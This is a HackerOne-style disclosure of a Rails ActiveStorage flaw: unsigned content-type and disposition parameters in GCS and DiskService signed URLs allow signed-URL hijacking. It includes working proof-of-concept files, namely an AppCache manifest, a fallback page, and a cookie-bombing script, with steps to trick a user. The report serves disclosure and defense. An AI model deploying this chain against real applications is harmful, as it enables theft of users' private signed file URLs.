Ruby on Rails: ActiveStorage service's signed URLs can be hijacked via AppCache+Cookie stuffing trick when using GCS or DiskService

2018-09-0720:39:10

rosa

hackerone.com

EPSS

0.001

Percentile

35.6%

JSON

ActiveStorage tries to force content-disposition: attachment for a list of content-types, including text/html. However, response-content-type and response-content-disposition in GCS and DiskService’s URLs aren’t signed, which means an attacker can modify them at will. This is not the case for Azure or S3.

This can be exploited using AppCache and cookie bombing as follows:

Upload the following file as ActiveStorage::Blob
File: fallback.html

&lt;html&gt;
&lt;script&gt;
  alert('Your request to the page '+location.href+' is hijacked!');
&lt;/script&gt;
&lt;/html&gt;

Grab the service signed URL for it and modify content type and content disposition params to text/html and inline.

Now upload this other file using that URL as fallback:
File: manifest.appcache

CACHE MANIFEST 
FALLBACK:
/bucket_name/ [fallback_url from previous step]

In the same way, grab the signed service URL and modify content disposition and type to ensure it’s served inline and as text/cache-manifest.

Finally, upload this file using the service URL for manifest.appcache:
File: main.html

&lt;html manifest="[manifest_url from the manifest above]"&gt;
Any requests to this bucket will be hijacked.
&lt;script&gt;
setTimeout(function(){
for(var i = 1e3; i&gt;0; i--){document.cookie = i + '=' + Array(4e3).join('0') + '; path=/'};
}, 3000);
&lt;/script&gt;
&lt;/html&gt;

Grab the service URL for main.html, modify content type and disposition to ensure it’s served as inline and text/html, and trick a user of the Rails app with access to ActiveStorage attachments into clicking it.

Since it’ll be open inline and as HTML, the JS code to overflow the cookies for the service (storage.googleapis.com in the case of GCS) will be executed. Next time the user makes a request for a file under the same bucket as main.html, googleapis.com will return an error due to the size of the cookie headers. This will be interpreted as being offline by the browser, which will offer the fallback specified in the manifest. The fallback.html above will be opened inline and as HTML as well, and its JS code executed. That code can be made to send location.href (the signed URL) to the attacker.